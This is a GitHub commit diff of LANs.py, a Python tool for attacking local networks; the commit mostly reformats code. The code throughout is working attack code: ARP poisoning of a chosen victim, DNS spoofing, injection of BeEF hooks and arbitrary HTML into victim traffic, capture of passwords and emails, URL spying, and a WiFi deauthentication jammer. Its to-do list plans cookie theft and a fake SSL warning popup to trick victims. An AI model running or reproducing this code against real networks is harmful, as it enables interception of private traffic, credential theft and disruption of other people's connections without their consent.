github/LANs.py
1
0
Fork 0
mirror of https://github.com/DanMcInerney/LANs.py.git synced 2025-07-06 13:02:20 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Fixed formatting.

Browse source
This commit is contained in:
David Dworken 2014-11-09 00:25:09 +00:00
parent 73fbf9904c
commit 59074dbab5
1 changed files with 1087 additions and 1005 deletions
Download patch file Download diff file Expand all files Collapse all files

196
LANs.py
View file

@ -13,37 +13,36 @@ Prerequisites: Linux
Note: This script flushes iptables before and after usage.
To do: 1. Rogue DHCP server
Refactor with lots of smaller functions
Mass wifi jammer
Cookie saver so you can browse using their cookies (how to use nfqueue with multiple queues?)
Add karma MITM technique
Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through
Integrate with wifite
2. Refactor with lots of smaller functions
3. Cookie saver so you can browse using their cookies (how to use nfqueue with multiple queues?)
4. Add karma MITM technique
5. Add SSL proxy for self-signed cert, and make the script force a single JS popup saying there's a temporary problem with SSL validation and to just click through
6. Integrate with wifite
'''
__author__ = 'Dan McInerney'
__license__ = 'BSD'
__contact__ = 'danhmcinerney with gmail'
__version__ = 1.1
def module_check(module):
'''
Just for debian-based systems like Kali and Ubuntu
'''
ri = raw_input('[-] python-%s not installed, would you like to install now? (apt-get install -y python-%s will be run if yes) [y/n]: ' % (module, module))
ri = raw_input(
'[-] python-%s not installed, would you like to install now? (apt-get install -y python-%s will be run if yes) [y/n]: ' % (
module, module))
if ri == 'y':
os.system('apt-get install -y python-%s' % module)
else:
exit('[-] Exiting due to missing dependency')
import os
try:
import nfqueue
except Exception:
module_check('nfqueue')
import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
try:
from scapy.all import *
@ -80,36 +79,65 @@ import fcntl
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--beef", help="Inject a BeEF hook URL. Example usage: -b http://192.168.0.3:3000/hook.js")
parser.add_argument("-c", "--code", help="Inject arbitrary html. Example usage (include quotes): -c '<title>New title</title>'")
parser.add_argument("-u", "--urlspy", help="Show all URLs and search terms the victim visits or enters minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -v to print all URLs and without truncation.", action="store_true")
parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and skip the arp ping at the beginning which would give you a list of possible targets. Usage: -ip <victim IP>")
parser.add_argument("-vmac", "--victimmac", help="Set the victim MAC; by default the script will attempt a few different ways of getting this so this option hopefully won't be necessary")
parser.add_argument("-b", "--beef",
help="Inject a BeEF hook URL. Example usage: -b http://192.168.0.3:3000/hook.js")
parser.add_argument("-c", "--code",
help="Inject arbitrary html. Example usage (include quotes): -c '<title>New title</title>'")
parser.add_argument("-u", "--urlspy",
help="Show all URLs and search terms the victim visits or enters minus URLs that end in .jpg, .png, .gif, .css, and .js to make the output much friendlier. Also truncates URLs at 150 characters. Use -v to print all URLs and without truncation.",
action="store_true")
parser.add_argument("-ip", "--ipaddress",
help="Enter IP address of victim and skip the arp ping at the beginning which would give you a list of possible targets. Usage: -ip <victim IP>")
parser.add_argument("-vmac", "--victimmac",
help="Set the victim MAC; by default the script will attempt a few different ways of getting this so this option hopefully won't be necessary")
parser.add_argument("-d", "--driftnet", help="Open an xterm window with driftnet.", action="store_true")
parser.add_argument("-v", "--verboseURL", help="Shows all URLs the victim visits but doesn't limit the URL to 150 characters like -u does.", action="store_true")
parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument. An argument like [facebook.com] will match all subdomains of facebook.com")
parser.add_argument("-v", "--verboseURL",
help="Shows all URLs the victim visits but doesn't limit the URL to 150 characters like -u does.",
action="store_true")
parser.add_argument("-dns", "--dnsspoof",
help="Spoof DNS responses of a specific domain. Enter domain after this argument. An argument like [facebook.com] will match all subdomains of facebook.com")
parser.add_argument("-a", "--dnsall", help="Spoof all DNS responses", action="store_true")
parser.add_argument("-set", "--setoolkit", help="Start Social Engineer's Toolkit in another window.", action="store_true")
parser.add_argument("-p", "--post", help="Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP usernames/passwords and incoming/outgoing emails. Will also decode base64 encrypted POP/IMAP username/password combos for you.", action="store_true")
parser.add_argument("-na", "--nmapaggressive", help="Aggressively scan the target for open ports and services in the background. Output to ip.add.re.ss.log.txt where ip.add.re.ss is the victim's IP.", action="store_true")
parser.add_argument("-n", "--nmap", help="Scan the target for open ports prior to starting to sniffing their packets.", action="store_true")
parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`.")
parser.add_argument("-r", "--redirectto", help="Must be used with -dns DOMAIN option. Redirects the victim to the IP in this argument when they visit the domain in the -dns DOMAIN option")
parser.add_argument("-rip", "--routerip", help="Set the router IP; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary")
parser.add_argument("-rmac", "--routermac", help="Set the router MAC; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary")
parser.add_argument("-set", "--setoolkit", help="Start Social Engineer's Toolkit in another window.",
action="store_true")
parser.add_argument("-p", "--post",
help="Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP usernames/passwords and incoming/outgoing emails. Will also decode base64 encrypted POP/IMAP username/password combos for you.",
action="store_true")
parser.add_argument("-na", "--nmapaggressive",
help="Aggressively scan the target for open ports and services in the background. Output to ip.add.re.ss.log.txt where ip.add.re.ss is the victim's IP.",
action="store_true")
parser.add_argument("-n", "--nmap",
help="Scan the target for open ports prior to starting to sniffing their packets.",
action="store_true")
parser.add_argument("-i", "--interface",
help="Choose the interface to use. Default is the first one that shows up in `ip route`.")
parser.add_argument("-r", "--redirectto",
help="Must be used with -dns DOMAIN option. Redirects the victim to the IP in this argument when they visit the domain in the -dns DOMAIN option")
parser.add_argument("-rip", "--routerip",
help="Set the router IP; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary")
parser.add_argument("-rmac", "--routermac",
help="Set the router MAC; by default the script with attempt a few different ways of getting this so this option hopefully won't be necessary")
parser.add_argument("-pcap", "--pcap", help="Parse through a pcap file")
###############################
#####End Lans.py Arguments#####
###Start wifijammer Argument###
###############################
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-ch", "--channel", help="Listen on and deauth only clients on the specified channel. Example: -ch 6") #######################################I Changed this!!!###############################3333
parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-no", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", action='store_true') #####################I changed this!!!#########################33
parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("--packets", help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2") #####################I changed this!!!!##############################
parser.add_argument("--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", action='store_true')#######################I changed this!!!########################################3
parser.add_argument("--accesspoint", help="Enter the MAC address of a specific access point to target") ##############I changed this!!!##############33
parser.add_argument("-ch", "--channel",
help="Listen on and deauth only clients on the specified channel. Example: -ch 6") #######################################I Changed this!!!###############################3333
parser.add_argument("-m", "--maximum",
help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-no", "--noupdate",
help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n",
action='store_true') #####################I changed this!!!#########################33
parser.add_argument("-t", "--timeinterval",
help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("--packets",
help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2") #####################I changed this!!!!##############################
parser.add_argument("--directedonly",
help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs",
action='store_true') #######################I changed this!!!########################################3
parser.add_argument("--accesspoint",
help="Enter the MAC address of a specific access point to target") ##############I changed this!!!##############33
return parser.parse_args()
#Console colors
@ -123,7 +151,6 @@ C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
logger = open('LANspy.log.txt', 'w+')
DN = open(os.devnull, 'w')
#############################
@ -132,6 +159,7 @@ DN = open(os.devnull, 'w')
interface = ''
def LANsMain(args):
global victimIP, interface
#Find the gateway and interface
@ -154,7 +182,8 @@ def LANsMain(args):
else:
interface = ipr[4]
if 'eth' in interface or 'p3p' in interface:
exit('[-] Wired interface found as default route, please connect wirelessly and retry, or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].')
exit(
'[-] Wired interface found as default route, please connect wirelessly and retry, or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].')
if args.ipaddress:
victimIP = args.ipaddress
else:
@ -212,7 +241,8 @@ def LANsMain(args):
logger.write("[*] Router MAC: " + routerMAC + '\n')
except Exception:
print "[-] Router did not respond to ARP request; attempting to pull MAC from local ARP cache - [/usr/bin/arp -n]"
logger.write("[-] Router did not respond to ARP request; attempting to pull the MAC from the ARP cache - [/usr/bin/arp -n]")
logger.write(
"[-] Router did not respond to ARP request; attempting to pull the MAC from the ARP cache - [/usr/bin/arp -n]")
try:
arpcache = Popen(['/usr/sbin/arp', '-n'], stdout=PIPE, stderr=DN)
split_lines = arpcache.communicate()[0].splitlines()
@ -240,7 +270,8 @@ def LANsMain(args):
print "[*] Victim MAC: " + victimMAC
logger.write("[*] Victim MAC: " + victimMAC + '\n')
except Exception:
exit("[-] Could not get victim MAC address; try the -vmac [xx:xx:xx:xx:xx:xx] option if you know the victim's MAC address\n and make sure the interface being used is accurate with -i <interface>")
exit(
"[-] Could not get victim MAC address; try the -vmac [xx:xx:xx:xx:xx:xx] option if you know the victim's MAC address\n and make sure the interface being used is accurate with -i <interface>")
ipf = setup(victimMAC)
Queued(args)
@ -261,21 +292,24 @@ def LANsMain(args):
print ''
class Spoof():
def originalMAC(self, ip):
# srp is for layer 2 packets with Ether layer, sr is for layer 3 packets like ARP and IP
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=5, retry=3)
for s, r in ans:
return r.sprintf("%Ether.src%")
def poison(self, routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst=victimMAC))
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst=routerMAC))
def restore(self, routerIP, victimIP, routerMAC, victimMAC):
send(ARP(op=2, pdst=routerIP, psrc=victimIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victimMAC), count=3)
send(ARP(op=2, pdst=victimIP, psrc=routerIP, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=routerMAC), count=3)
class Parser():
class Parser():
# Mail, irc, post parsing
OheadersFound = []
IheadersFound = []
@ -529,7 +563,8 @@ class Parser():
# I figured better to err on the site of more data than less and it's easy to tell the false positives from the real searches
def searches(self, url, host):
# search, query, search?q, ?s, &q, ?q, search?p, searchTerm, keywords, command
searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|search[Tt]erm|keywords|command)=([^&][^&]*))', url)
searched = re.search(
'((search|query|search\?q|\?s|&q|\?q|search\?p|search[Tt]erm|keywords|command)=([^&][^&]*))', url)
if searched:
searched = searched.group(3)
# Common false positives
@ -538,7 +573,11 @@ class Parser():
if host == 'geo.yahoo.com':
pass
else:
searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$')
searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27',
'\'').replace(
'%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22',
'\"').replace('%24',
'$')
print T + '[+] Searched ' + W + host + T + ': ' + searched + W
logger.write('[+] Searched ' + host + ' for: ' + searched + '\n')
@ -881,7 +920,10 @@ class Parser():
def dnsspoof_actions(self, dns_layer, IP_src, IP_dst, sport, dport, payload, rIP):
p = IP(dst=IP_src, src=IP_dst)/UDP(dport=sport, sport=dport)/DNS(id=dns_layer.id, qr=1, aa=1, qd=dns_layer.qd, an=DNSRR(rrname=dns_layer.qd.qname, ttl=10, rdata=rIP))
p = IP(dst=IP_src, src=IP_dst) / UDP(dport=sport, sport=dport) / DNS(id=dns_layer.id, qr=1, aa=1,
qd=dns_layer.qd,
an=DNSRR(rrname=dns_layer.qd.qname, ttl=10,
rdata=rIP))
payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(p), len(p))
if self.args.dnsspoof:
print G + '[!] Sent spoofed packet for ' + W + self.args.dnsspoof + G + ' to ' + W + rIP
@ -901,17 +943,21 @@ class Queued(object):
reactor.addReader(self)
self.q.set_mode(nfqueue.NFQNL_COPY_PACKET)
print '[*] Flushed firewall and forwarded traffic to the queue; waiting for data'
def fileno(self):
return self.q.get_fd()
def doRead(self):
self.q.process_pending(500) # if I lower this to, say, 5, it hurts injection's reliability
def connectionLost(self, reason):
reactor.removeReader(self)
def logPrefix(self):
return 'queued'
class active_users():
class active_users():
IPandMAC = []
start_time = time.time()
current_time = 0
@ -1024,6 +1070,7 @@ def print_vars(DHCPsrvr, dnsIP, local_domain, routerIP, victimIP):
logger.write("[*] Router IP: " + routerIP + '\n')
logger.write("[*] victim IP: " + victimIP + '\n')
#Enable IP forwarding and flush possibly conflicting iptables rules
def setup(victimMAC):
os.system('/sbin/iptables -F')
@ -1031,10 +1078,14 @@ def setup(victimMAC):
os.system('/sbin/iptables -t nat -F')
os.system('/sbin/iptables -t nat -X')
# Just throw packets that are from and to the victim into the reactor
os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
os.system('/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
os.system('/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
os.system(
'/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
os.system(
'/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
os.system(
'/sbin/iptables -A FORWARD -p tcp -s %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
os.system(
'/sbin/iptables -A FORWARD -p tcp -d %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
# To catch DNS packets you gotta do prerouting rather than forward for some reason?
os.system('/sbin/iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
with open('/proc/sys/net/ipv4/ip_forward', 'r+') as ipf:
@ -1042,20 +1093,23 @@ def setup(victimMAC):
print '[*] Enabled IP forwarding'
return ipf.read()
# Start threads
def threads(args):
rt = Thread(target=reactor.run, args=(False,)) #reactor must be started without signal handling since it's not in the main thread
rt = Thread(target=reactor.run,
args=(False,)) #reactor must be started without signal handling since it's not in the main thread
rt.daemon = True
rt.start()
if args.driftnet:
dr = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/driftnet -i '+interface+' >/dev/null 2>&1',))
dr = Thread(target=os.system,
args=('/usr/bin/xterm -e /usr/bin/driftnet -i ' + interface + ' >/dev/null 2>&1',))
dr.daemon = True
dr.start()
if args.dnsspoof and not args.setoolkit:
setoolkit = raw_input('[*] You are DNS spoofing '+args.dnsspoof+', would you like to start the Social Engineer\'s Toolkit for easy exploitation? [y/n]: ')
setoolkit = raw_input(
'[*] You are DNS spoofing ' + args.dnsspoof + ', would you like to start the Social Engineer\'s Toolkit for easy exploitation? [y/n]: ')
if setoolkit == 'y':
print '[*] Starting SEtoolkit. To clone ' + args.dnsspoof + ' hit options 1, 2, 3, 2, then enter ' + args.dnsspoof
try:
@ -1068,7 +1122,8 @@ def threads(args):
if args.nmapaggressive:
print '[*] Starting ' + R + 'aggressive scan [nmap -e ' + interface + ' -T4 -A -v -Pn -oN ' + victimIP + ']' + W + ' in background; results will be in a file ' + victimIP + '.nmap.txt'
try:
n = Thread(target=os.system, args=('nmap -e '+interface+' -T4 -A -v -Pn -oN '+victimIP+'.nmap.txt '+victimIP+' >/dev/null 2>&1',))
n = Thread(target=os.system, args=(
'nmap -e ' + interface + ' -T4 -A -v -Pn -oN ' + victimIP + '.nmap.txt ' + victimIP + ' >/dev/null 2>&1',))
n.daemon = True
n.start()
except Exception:
@ -1083,12 +1138,14 @@ def threads(args):
except Exception:
print '[-] Could not open SEToolkit, continuing without it.'
def pcap_handler(args):
global victimIP
bad_args = [args.dnsspoof, args.beef, args.code, args.nmap, args.nmapaggressive, args.driftnet, args.interface]
for x in bad_args:
if x:
exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')
exit(
'[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')
if args.pcap:
if args.ipaddress:
victimIP = args.ipaddress
@ -1099,7 +1156,8 @@ def pcap_handler(args):
else:
exit('[-] Please include the following arguement when reading from a pcap file: -ip [target\'s IP address]')
else:
exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')
exit(
'[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')
# Cleans up if Ctrl-C is caught
def signal_handler(signal, frame):
@ -1114,6 +1172,7 @@ def pcap_handler(args):
os.system('/sbin/iptables -t nat -F')
os.system('/sbin/iptables -t nat -X')
exit(0)
signal.signal(signal.SIGINT, signal_handler)
while 1:
@ -1137,7 +1196,7 @@ first_pass = 1
def wifijammerMain(args):
confirmJam = raw_input("Are you sure you want to jam WiFi? (y/n)")
confirmJam = raw_input("Are you sure you want to jam WiFi? This may be illegal in your area. (y/n)")
if "n" in confirmJam:
exit("Program cancelled.")
print("Ok. Jamming.")
@ -1176,6 +1235,7 @@ def get_mon_iface(args):
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
@ -1196,6 +1256,7 @@ def iwconfig():
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
DN = open(os.devnull, 'w')
@ -1216,7 +1277,16 @@ def get_iface(interfaces):
print '[' + G + '+' + W + '] Networks discovered by ' + G + iface + W + ': ' + T + str(count) + W
try:
interface = max(scanned_aps)[1]
print '[' + G + '+' + W + '] ' + interface + " chosen. Is this ok? [Enter=yes] "
input = raw_input()
if input == "" or input == "y" or input == "Y" or input.lower() == "yes":
return interface
else:
interfaceInput = raw_input("What interface would you like to use instead? ")
if interfaceInput in interfaces:
return interfaceInput
else:
print '[' + R + '!' + W + '] Exiting: Invalid Interface!'
except Exception as e:
for iface in interfaces:
interface = iface
@ -1224,6 +1294,7 @@ def get_iface(interfaces):
print ' Starting monitor mode on ' + G + interface + W
return interface
def start_mon_mode(interface):
print '[' + G + '+' + W + '] Starting monitor mode off ' + G + interface + W
try:
@ -1234,11 +1305,13 @@ def start_mon_mode(interface):
except Exception:
sys.exit('[' + R + '-' + W + '] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
@ -1249,6 +1322,7 @@ def mon_mac(mon_iface):
print '[' + G + '*' + W + '] Monitor mode: ' + G + mon_iface + W + ' - ' + O + mac + W
return mac
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
@ -1332,6 +1406,7 @@ def deauth(monchannel):
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
mon_iface = get_mon_iface(args)
@ -1345,7 +1420,8 @@ def output(err, monchannel):
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
print '[' + T + '*' + W + '] ' + O + ca[0] + W + ' - ' + O + ca[1] + W + ' - ' + ca[2].ljust(
2) + ' - ' + T + ca[3] + W
else:
print '[' + T + '*' + W + '] ' + O + ca[0] + W + ' - ' + O + ca[1] + W + ' - ' + ca[2]
if len(APs) > 0:
@ -1355,15 +1431,18 @@ def output(err, monchannel):
print '[' + T + '*' + W + '] ' + O + ap[0] + W + ' - ' + ap[1].ljust(2) + ' - ' + T + ap[2] + W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:',
mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
@ -1406,6 +1485,7 @@ def cb(pkt):
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3
@ -1434,8 +1514,8 @@ def APs_add(clients_APs, APs, pkt, chan_arg):
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
@ -1455,12 +1535,14 @@ def clients_APs_add(clients_APs, addr1, addr2):
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n[' + R + '!' + W + '] Closing')